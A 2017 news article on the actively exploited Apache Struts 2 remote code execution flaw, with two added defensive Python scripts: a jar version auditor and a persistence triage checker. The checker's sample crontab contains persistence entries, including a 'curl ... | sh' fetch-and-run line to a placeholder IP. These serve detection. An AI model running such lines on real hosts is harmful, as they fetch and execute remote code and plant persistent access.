Critical web server bug puts thousands of sites at immediate risk

By James Walker     Mar 9, 2017 in Technology
Administrators in charge of web servers used by major apps, governments and banks are scrambling to install patches for a potentially catastrophic vulnerability found in a popular web development framework. The flaw is being actively exploited.
The bug allows an attacker to execute arbitrary code on the web server, giving them the ability to access or destroy data, create user accounts, lock out admins or install more malware. Beyond simple probing, two different exploitation techniques are known to be in use, and the Cisco Talos researchers who reported the in-the-wild attacks warned of a "high number" of attempts.
In the two days since Cisco's public disclosure, the number of attacks has ballooned as hackers rush to take advantage of the serious issue. The flaw lies in Apache Struts 2, a framework that developers use to build web applications in the Java programming language. Struts is widely deployed, including by highly sensitive services.
The developers behind Struts have already released a fixed version. However, most Struts servers haven't yet been updated. Until administrators have installed the new version, their apps remain at risk of attack. Hackers are scanning the Internet to identify vulnerable servers.
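Whether a given host has actually picked up the fixed version is easy to get wrong, because the framework ships as a jar inside each deployed application rather than as a system package. The script below is an added example, not code from the article or from the Struts project: it walks a deployment root (for example a Tomcat webapps directory), finds every struts2-core jar in exploded applications and inside packed .war/.ear archives, and compares the jar's version with the first fixed release of its line. The fixed version numbers are not hard-coded; pass the ones given in the Apache advisory on the command line. The option syntax, the manifest fallback and the report format are this example's own assumptions.

```python
"""Usage: struts_audit.py <deployment-root> <major.minor=first-fixed-version>...

Added example (not from the article or the Struts project): inventory every
struts2-core jar under a deployment root and flag those older than the first
fixed release of their line, as published in the Apache security advisory.
"""
import os
import re
import sys
import zipfile
from typing import Dict, Iterable, List, Optional, Tuple

# Matches struts2-core-2.3.31.jar, struts2-core-2.5.10.1.jar, ...
JAR_RE = re.compile(r"^struts2-core-(\d+(?:\.\d+)+)\.jar$")
ReleaseLine = Tuple[int, int]
Finding = Tuple[str, Optional[str], str]


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.5.10.1' -> (2, 5, 10, 1); tuples compare component-wise."""
    return tuple(int(part) for part in text.split("."))


def version_from_name(name: str) -> Optional[str]:
    """Version encoded in the jar filename, or None if it was renamed."""
    match = JAR_RE.match(os.path.basename(name))
    return match.group(1) if match else None


def version_from_manifest(data: bytes) -> Optional[str]:
    """Fallback for renamed jars: read the version out of META-INF/MANIFEST.MF."""
    for line in data.decode("utf-8", "replace").splitlines():
        for key in ("Implementation-Version:", "Bundle-Version:"):
            if line.startswith(key):
                return line[len(key):].strip()
    return None


def status(version: Optional[str], fixed: Dict[ReleaseLine, str]) -> str:
    """Classify a version against the first fixed release of its major.minor line."""
    if version is None:
        return "unknown"
    parsed = parse_version(version)
    line = parsed[:2]
    if line not in fixed:
        return "unknown-line"  # no fixed version supplied for this line
    return "patched" if parsed >= parse_version(fixed[line]) else "VULNERABLE"


def audit_names(names: Iterable[str], fixed: Dict[ReleaseLine, str]) -> List[Finding]:
    """Classify jar paths by filename alone (no file access needed)."""
    return [(n, version_from_name(n), status(version_from_name(n), fixed)) for n in names]


def find_struts_jars(root: str) -> Iterable[Tuple[str, Optional[str]]]:
    """Yield (location, version) for struts2-core jars under root, looking in
    exploded webapps and inside packed .war/.ear archives."""
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if fname.startswith("struts2-core") and fname.endswith(".jar"):
                version = version_from_name(fname)
                if version is None:
                    try:
                        with zipfile.ZipFile(path) as jar:
                            version = version_from_manifest(jar.read("META-INF/MANIFEST.MF"))
                    except (zipfile.BadZipFile, KeyError, OSError):
                        version = None
                yield path, version
            elif fname.endswith((".war", ".ear")):
                try:
                    with zipfile.ZipFile(path) as archive:
                        for entry in archive.namelist():
                            base = os.path.basename(entry)
                            if base.startswith("struts2-core") and base.endswith(".jar"):
                                yield f"{path}!{entry}", version_from_name(base)
                except (zipfile.BadZipFile, OSError):
                    continue


def audit(root: str, fixed: Dict[ReleaseLine, str]) -> List[Finding]:
    return [(loc, ver, status(ver, fixed)) for loc, ver in find_struts_jars(root)]


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit(__doc__)
    fixed_lines: Dict[ReleaseLine, str] = {}
    for arg in sys.argv[2:]:
        line_text, fixed_version = arg.split("=", 1)
        fixed_lines[parse_version(line_text)[:2]] = fixed_version
    for location, version, verdict in audit(sys.argv[1], fixed_lines):
        print(f"{verdict:12} {version or '?':10} {location}")
```

Run it against every application server on the host, not just the one you remember deploying Struts to; a jar that reports "unknown" was renamed or repackaged and needs a manual look, and "unknown-line" means you did not supply a fixed version for that release line. A version check only confirms the jar on disk; the running JVM must also have been restarted since the update for it to matter.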
Cisco has observed three primary attacks currently being deployed. The first is a simple probe that runs an innocuous Linux command. If the command's output appears in the server's response, the attacker knows the server is vulnerable and can follow up with a series of malicious scripts.
At present, the more aggressive forms of the attack shut down security applications on the server and then install malware. Programs seen installed include a denial-of-service bot and an IRC bouncer.
The final class of command being sent to Struts servers aims to achieve persistent access to the machine. The attackers run system commands that copy their malware to the filesystem and then register it to run each time the server starts up. This allows them to continually monitor the machine and any changes to its data.
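Because the persistence step registers the implant to run at boot, a host that was exposed before it was patched needs a look at its autostart locations, not just a version check. The script below is an added example, not code from the article or from Cisco: it lists files under the usual Linux autostart paths that changed after a known-good baseline, and flags startup lines whose command runs something from a world-writable scratch directory, a hidden path, or a network download. The path list and the flagging rules are assumptions for a typical Linux web host and will need adjusting for the distribution in use; the sample crontab is constructed for illustration.

```python
"""Added example (not from the article or Cisco): triage Linux autostart
locations for persistence planted after a known-good baseline."""
import os
import re
import time
from typing import Iterable, List, Tuple

# Assumed autostart locations for a typical Linux web host; adjust per distribution.
AUTOSTART_PATHS = [
    "/etc/rc.local", "/etc/crontab", "/etc/cron.d", "/var/spool/cron",
    "/etc/init.d", "/etc/systemd/system", "/etc/profile.d",
]
# World-writable directories that a legitimate startup entry rarely runs from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")        # e.g. /tmp/.x/implant
DOWNLOADER = re.compile(r"\b(curl|wget)\b")     # fetch-and-run at boot


def files_modified_since(paths: Iterable[str], since_epoch: float) -> List[Tuple[str, float]]:
    """Return (path, mtime) for every file under paths modified after since_epoch."""
    hits = []
    for p in paths:
        if os.path.isfile(p):
            candidates = [p]
        elif os.path.isdir(p):
            candidates = [os.path.join(d, f) for d, _, fs in os.walk(p) for f in fs]
        else:
            continue  # location absent on this host
        for c in candidates:
            try:
                mtime = os.stat(c).st_mtime
            except OSError:
                continue
            if mtime > since_epoch:
                hits.append((c, mtime))
    return sorted(hits, key=lambda h: h[1], reverse=True)


def suspicious_startup_lines(text: str) -> List[str]:
    """Return non-comment lines of a crontab/rc.local/unit file whose command
    runs from a scratch directory or hidden path, or downloads at start-up."""
    flagged = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if (any(d in line for d in SCRATCH_DIRS)
                or HIDDEN_PATH.search(line)
                or DOWNLOADER.search(line)):
            flagged.append(line)
    return flagged


# Constructed sample crontab: one benign entry and two persistence-style entries.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root /tmp/.x/sysupdate -d
* * * * * www-data curl -s http://198.51.100.7/a.sh | sh
"""


if __name__ == "__main__":
    baseline = time.time() - 7 * 24 * 3600  # assumed baseline: one week ago
    for path, mtime in files_modified_since(AUTOSTART_PATHS, baseline):
        print(f"changed {time.strftime('%Y-%m-%d %H:%M', time.localtime(mtime))} {path}")
    for line in suspicious_startup_lines(SAMPLE_CRONTAB):
        print(f"flagged: {line}")
```

Pair the modification-time sweep with the line check on each file it reports; a freshly changed /etc/cron.d entry that runs a binary out of /tmp is the pattern the Talos description points at. Treat the output as leads for a proper forensic image, not as proof of a clean host: an attacker who has had root can reset timestamps.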
Cisco said the bug began to see widespread public exploitation after Apache publicly detailed the issue in a security advisory on Sunday. The company warned the volume of attacks is showing no signs of slowing down and is likely to see sustained exploitation for a significant amount of time. The vulnerability is trivial to exploit, requiring nothing more than a specially crafted HTTP request to be sent to the server.
"Upon deployment [of the advisory] we saw immediate exploitation occurring," said Cisco. "This exploitation has continued steadily since. It is likely that the exploitation will continue in a wide scale since it is relatively trivial to exploit and there are clearly systems that are potentially vulnerable."
With so many Struts servers in use, the bug is currently a highly attractive target for cybercriminals looking for easy hits. Although companies, governments and website administrators have been sent information on the importance of installing the update, it's likely it'll be some time before every system is fully protected.